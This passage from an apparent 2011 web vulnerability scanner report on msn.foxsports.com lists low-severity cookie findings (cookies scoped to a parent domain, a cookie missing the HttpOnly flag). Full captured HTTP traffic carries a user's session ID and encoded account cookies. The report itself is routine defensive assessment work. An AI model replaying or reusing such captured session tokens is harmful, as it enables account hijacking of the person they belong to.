Set-Cookie: pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/


7.2. http://msn.foxsports.com/account/verify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/verify

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/verify?euid=%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://msn.foxsports.com/account/transition?fu=%2F&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D
Content-Length: 0
Expires: Sat, 08 Jan 2011 00:30:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:30:34 GMT
Connection: close
Set-Cookie: pALERTED=TRUE; Domain=.foxsports.com; Expires=Mon, 07-Feb-2011 00:30:34 GMT; Path=/
Set-Cookie: pEFSUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Path=/
Set-Cookie: pExternalUser=; Domain=.foxsports.com; Path=/
Set-Cookie: pLMD="2011-01-08 00:29:40"; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_FNAME=Z1NVLTXWY1w=; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_LNAME=/wgeX1XilBI=; Domain=.foxsports.com; Path=/
Set-Cookie: pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; Domain=.foxsports.com; Path=/
Set-Cookie: pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; Domain=.foxsports.com; Path=/
Set-Cookie: pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; Domain=.foxsports.com; Path=/
Set-Cookie: pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; Domain=.foxsports.com; Path=/
Set-Cookie: pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; Domain=.foxsports.com; Path=/
Set-Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; Domain=.foxsports.com; Path=/
Set-Cookie: pUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Path=/


7.3. http://msn.foxsports.com/fantasy/basketball/hotstreak/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/basketball/hotstreak/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fantasy/basketball/hotstreak/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 27381
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKsceEx4Px8ipDX7pZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

7.4. http://msn.foxsports.com/fantasy/football/frankspicks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/football/frankspicks/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fantasy/football/frankspicks/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 24812
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKscei73uaW8KKlbpZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

8. Cookie without HttpOnly flag set
There are 9 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



8.1. http://msn.foxsports.com/account/logout

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/logout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/logout HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://msn.foxsports.com/account/transition?fu=%2F&initiatingAction=logout
Content-Length: 0
Expires: Sat, 08 Jan 2011 01:12:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:12:06 GMT
Connection: close
Set-Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pLMD="2011-01-08 00:30:34"; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_LNAME=/wgeX1XilBI=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
